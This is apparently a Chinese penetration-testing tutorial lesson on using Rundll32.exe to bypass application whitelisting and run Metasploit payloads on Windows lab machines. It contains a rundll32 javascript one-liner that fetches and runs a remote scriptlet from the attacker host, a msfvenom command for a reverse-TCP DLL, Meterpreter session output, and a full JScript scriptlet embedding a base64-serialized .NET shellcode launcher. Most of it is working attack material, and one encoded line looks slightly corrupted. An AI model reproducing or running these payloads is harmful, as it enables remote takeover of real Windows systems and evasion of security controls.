第八十一课:基于白名单Rundll32.exe执行payload第十一季

注:请多喝点热水或者凉白开,可预防肾结石,通风等。

Rundll32简介:

Rundll32.exe是指“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,功能就是以命令行的方式调用动态链接程序库。

说明:Rundll32.exe所在路径已被系统添加PATH环境变量中,因此,Wmic命令可识别,需注意x86,x64位的Rundll32调用。

Windows 2003 默认位置:

C:\Windows\System32\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe

Windows 7 默认位置:

C:\Windows\System32\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe

攻击机: 192.168.1.4 Debian 靶机: 192.168.1.119 Windows 2003 192.168.1.5 Windows 7

基于远程加载(1):

配置攻击机msf: 注:x86 payload

msf exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ 

Payload options (windows/meterpreter/reverse_tcp): 

Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 192.168.1.4 yes The listen address (an interface may be specified)

LPORT 53 yes The listen port 

Exploit target: 

Id Name
‐‐ ‐‐‐‐
0 Wildcard Target 

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.4:53

靶机执行:

C:\Windows\SysWOW64\rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:http://192.168.1.4/Rundll32_shellcode")
msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.4:53
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 57 opened (192.168.1.4:53> 192.168.1.5:41274)
at 2019‐01‐19 04:13:26 ‐0500
meterpreter > getuid
Server username: John‐PC\John
meterpreter > getpid
Current pid: 7064
meterpreter >

基于本地加载(2):

payload配置:

msfvenom ‐a x86 ‐‐platform windows ‐p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐f dll > Micropoor_Rundll32.dll
msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.4:53
[*] Sending stage (179779 bytes) to 192.168.1.5
[*] Meterpreter session 63 opened (192.168.1.4:53> 192.168.1.5:43320)
at 2019‐01‐19 04:34:59 ‐0500
meterpreter > getuid
Server username: John‐PC\John
meterpreter > getpid
Current pid: 6656

基于命令执行(3):

靶机执行:

Windows 2003:

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"mstsc\");window.close()");

注:如靶机支持powershell,调用powershell更贴合实战。

附录:Rundll32_shellcode

<?xml version="1.0"?> 
<package>
<component id="Micropoor"> 

<script language="JScript">
<![CDATA[
function setversion() {
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
} 

var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABQAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAVC1CXAAAAAAA"+
"AAAA4AACIQsBCwAADAAAAAYAAAAAAAAOKgAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAwCkA"+
"AEsAAAAAQAAA0AIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAAAUCgAAACAAAAAMAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAA0AIAAABA"+
"AAAABAAAAA4AAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAASAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAPApAAAAAAAASAAAAAIABQBEIgAAfAcAAAMAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQgIoBAAACgAA"+
"KAIAAAYAACoAAAAAAAAA/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH"+
"4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiL"+
"WCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/"+
"0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAEEaAIAADWJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/"+
"1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBW"+
"U1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMp"+
"xnXBw7vwtaJWagBT/9UAAAATMAYAZQAAAAEAABEAIFUBAACNBgAAASXQAwAABCgGAAAKC
hYGjml+"+"AQAABH4CAAAEKAMAAAYLBhYHbigHAAAKBo5pKAgAAAoAfgkAAAoMFg1+CQAAChMEFhYHEQQWEgMo"+
"BAAABgwIFSgFAAAGJisAKkogABAAAIABAAAEH0CAAgAABCpCU0pCAQABAAAAAAAMAAAAdjQuMC4z"+
"MDMxOQAAAAAFAGwAAABgAgAAI34AAMwCAABkAwAAI1N0cmluZ3MAAAAAMAYAAAgAAAAjVVMAOAYA"+
"ABAAAAAjR1VJRAAAAEgGAAA0AQAAI0Jsb2IAAAAAAAAAAgAAAVfVAjQJAgAAAPolMwAWAAABAAAA"+
"DwAAAAQAAAADAAAABgAAAAwAAAALAAAABAAAAAEAAAABAAAAAQAAAAEAAAADAAAAAQAAAAEAAAAB"+
"AAAAAQAAAAAACgABAAAAAAAGAEsARAAGAFsBPwEGAHcBPwEGAKYBhgEGAMYBhgEGAPcBRAAGAEEC"+
"hgEGAFwCRAAGAJgChgEGAKcCRAAGAK0CRAAGANACRAAGAAID4wIGABQD4wIGAEcDNwMAAAAAAQAA"+
"AAAAAQABAAEAEAAhACkABQABAAEAAAAAAPwBAAAFAAMABwATAQAAZgIAACEABAAHABEAXQASABEA"+
"aAASABMBhAI+AFAgAAAAAIYYUgAKAAEAwCEAAAAAkQBYAA4AAQAAAAAAgACRIH8AFQABAAAAAACA"+
"AJEgjAAdAAUAAAAAAIAAkSCZACgACwAxIgAAAACRGDADDgANAAAAAQCtAAAAAgC5AAAAAwC+AAAA"+
"BADPAAAAAQDZAAAAAgDsAAAAAwD4AAAABAAHAQAABQANAQAABgAdAQAAAQAoAQAAAgAwAREAUgAu"+
"ACEAUgA0ACkAUgAKAAkAUgAKADkAUgAKAEkAwAJCAGEA1wJKAGkACgNPAGEADwNYAHEAUgBkAHkA"+
"UgAKACcAWwA5AC4AEwBpAC4AGwByAGMAKwA5AAgABgCRAAEAVQEAAAQAWwAnAwABBwB/AAEAAAEJ"+
"AIwAAQAAAQsAmQABAGggAAADAASAAAAAAAAAAAAAAAAAAAAAAOQBAAAEAAAAAAAAAAAAAAABADsA"+
"AAAAAAQAAwAAAAA8TW9kdWxlPgB3bWlfY3NfZGxsX3BheWxvYWQuZGxsAFByb2dyYW0AU2hlbGxD"+
"b2RlTGF1bmNoZXIAbXNjb3JsaWIAU3lzdGVtAE9iamVjdAAuY3RvcgBNYWluAE1FTV9DT01NSVQA"+
"UEFHRV9FWEVDVVRFX1JFQURXUklURQBWaXJ0dWFsQWxsb2MAQ3JlYXRlVGhyZWFkAFdhaXRGb3JT"+
"aW5nbGVPYmplY3QAbHBTdGFydEFkZHIAc2l6ZQBmbEFsbG9jYXRpb25UeXBlAGZsUHJvdGVjdABs"+
"cFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUAbHBTdGFydEFkZHJlc3MAcGFyYW0AZHdDcmVh"+
"dGlvbkZsYWdzAGxwVGhyZWFkSWQAaEhhbmRsZQBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uU2VjdXJp"+
"dHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAFNlY3VyaXR5QWN0aW9u"+
"AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0"+
"dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB3bWlfY3NfZGxsX3BheWxvYWQA"+
"Qnl0ZQA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz57MEQxQTVERjAtRDZCNy00RUUzLUJB"+
"QzItOTY0MUUyREJCMDNFfQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBWYWx1ZVR5cGUAX19T"+
"dGF0aWNBcnJheUluaXRUeXBlU2l6ZT0zNDEAJCRtZXRob2QweDYwMDAwMDItMQBSdW50aW1lSGVs"+
"cGVycwBBcnJheQBSdW50aW1lRmllbGRIYW5kbGUASW5pdGlhbGl6ZUFycmF5AEludFB0cgBvcF9F"+
"eHBsaWNpdABTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWFyc2hhbABDb3B5AFplcm8A"+
"RGxsSW1wb3J0QXR0cmlidXRlAGtlcm5lbDMyAC5jY3RvcgBTeXN0ZW0uU2VjdXJpdHkAVW52ZXJp"+
"ZmlhYmxlQ29kZUF0dHJpYnV0ZQAAAAAAAyAAAAAAAPBdGg231uNOusKWQeLbsD4ACLd6XFYZNOCJ"+
"AyAAAQMAAAECBgkHAAQJCQkJCQoABhgJCQkYCRAJBQACCRgJBSABARENBCABAQgEAQAAAAMGERAH"+
"AAIBEikRLQQAARgKCAAEAR0FCBgIAgYYCAcFHQUJGAkYBCABAQ4IAQAIAAAAAAAeAQABAFQCFldy"+
"YXBOb25FeGNlcHRpb25UaHJvd3MBgJ4uAYCEU3lzdGVtLlNlY3VyaXR5LlBlcm1pc3Npb25zLlNl"+
"Y3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs"+
"dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5FQFUAhBTa2lwVmVy"+
"aWZpY2F0aW9uAQAAAOgpAAAAAAAAAAAAAP4pAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwKQAA"+
"AAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAA"+
"AQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAB0AgAAAAAAAAAAAAB0AjQAAABW"+
"AFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAAAAAAAAAA"+
"PwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAA"+
"AAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAE1AEAAAEAUwB0AHIAaQBuAGcA"+
"RgBpAGwAZQBJAG4AZgBvAAAAsAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwAZQBE"+
"AGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4A"+
"AAAAADAALgAwAC4AMAAuADAAAABQABcAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAHcAbQBp"+
"AF8AYwBzAF8AZABsAGwAXwBwAGEAeQBsAG8AYQBkAC4AZABsAGwAAAAAACgAAgABAEwAZQBnAGEA"+
"bABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAABYABcAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBu"+
"AGEAbQBlAAAAdwBtAGkAXwBjAHMAXwBkAGwAbABfAHAAYQB5AGwAbwBhAGQALgBkAGwAbAAAAAAA"+
"NAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAAB"+
"AEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABA6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZs"+
"ZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA";
var entry_class = 'ShellCodeLauncher.Program'; 

try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var d = fmt.Deserialize_2(stm);
al.Add(undefined);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 
} catch (e) {
debug(e.message);
} 

]]>
</script> 

</component>
</package>

Micropoor

Last updated